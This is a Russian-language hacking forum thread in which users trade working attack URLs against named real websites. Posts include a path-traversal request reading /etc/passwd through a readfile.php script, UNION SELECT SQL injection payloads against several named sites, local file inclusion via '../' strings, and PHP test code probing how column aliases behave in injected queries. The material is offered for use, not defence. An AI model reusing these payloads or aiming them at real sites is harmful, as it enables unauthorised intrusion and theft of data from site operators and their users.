опять гуглил на дырявые readfile.php
[code]
www.elitemodel.fr/modellook/data/readfile.php?filename=/etc/passwd
[/code]

советую посмотреть
[code]
www.elitemodel.fr/modellook/data/readfile.php?filename=upload_flash.php
[/code]

гениальный код

2agata там все просто обычная скуля
[code]
www.wwf.ru/about/people/tab63/?oid.in=-240)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
[/code]

2all а как быть с етой

[code]
sexlite.ru/index/ssssssss
[/code]

вот тут SELECT-ами и LIMIT-ами запахло

[code]
sexlite.ru/cat/36/page/fff
[/code]
но провести INJ не смог

пока писал уже опередили

[code]
$query='select 1,2 bbb,3 bbb,4 sss,5,6';
$query1='select 1,2 as bbb,3 as bbb,4 as sss,5,6';
if(!($query_id = mysql_query($query1, $db_id))) {
echo mysql_error().'
';
echo mysql_errno().'
';
die;
}
while($row = mysql_fetch_assoc($query_id)) {
print_r($row);
}

[/code]

оба query дают
[code]
Array ( [1] => 1 [bbb] => 3 [sss] => 4 [5] => 5 [6] => 6 )
[/code]
оказывается можно пропускать ' as ' :)

дело не в сайте.
вот тестил на локалке

[code]
$query='select * from users where id=-1 union select 1,2,3,4,5,6';
$query1='select * from users where id=-1 union select 1,2 aaa,3 bbb,4 ccc,5 ddd,6';
if(!($query_id = mysql_query($query1, $db_id))) {
echo mysql_error().'
';
echo mysql_errno().'
';
die;
}
while($row = mysql_fetch_assoc($query_id)) {
echo $row['id'].' ';
echo $row['login'].' ';
echo $row['password'].'
';
}
[/code]

оба query один и тотже вывод, тут или mysql_query() или сам mysql.

при $query='select * from users where id=-1 union select 1,2 aaa gggg,3 bbb,4 ccc,5 ddd,6';
[code]
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'gggg,3 bbb,4 ccc,5 ddd,6' at line 1
[/code]

так тоже катит
[code]
$query1='select * from users where id=-1 union select 1,login sss,3,4,5,6 from users limit 1';
[/code]

вот inj
[code]
www.tutpricol.ru/message.php?id=143999+union+select+11,22,33,44,55--
[/code]
видим 44 22 33.

почему катит так
[code]
www.tutpricol.ru/message.php?id=143999+union+select+11+blablabla,22+blublublu,33+bliblibli,44+blobloblo,55--
[/code]

почему не ругается на blablabla,blublublu,blublublu,blobloblo?????

но если вместо них вбить любое зарезервированное слово например select то ругается на селект

так уже не катит
[code]
www.tutpricol.ru/message.php?id=143999+union+select+11+blablabla,22+blublublu,33+bliblibli,44+blobloblo+ggggg,55--
[/code]

на локалке
[code]
localhost/test.php?id=-1+union+select+1,2+wwww+ssss,3--
[/code]

получаем unknown column ssss

?????????????????????????????????????????????????????????????????????

[code]
tour.naughtyamerica.com/index.php?&m;=scenes≻_id=10&title;=mfsts&fan;_type=category&fan;_id=19999--&nats;=MTIxMjUwOjQ6MjE&shell;=mfst&PHPSESSID;=d76157dccb387dfab925273fd2172251
[/code]
если издеваться над fan_id то получаем
Notice: Array to string conversion in naughty/naughtycms.naughtyamerica.com/system/includes/functions.php on line 537

что можно из етого взять

ну начну я

[code]
www.pryanishnikov.ru/onas.php?str=../news

www.pryanishnikov.ru/onas.php?str=../../sexdisc/link
инклудим www.sexdisc.ru/link.php

[/code]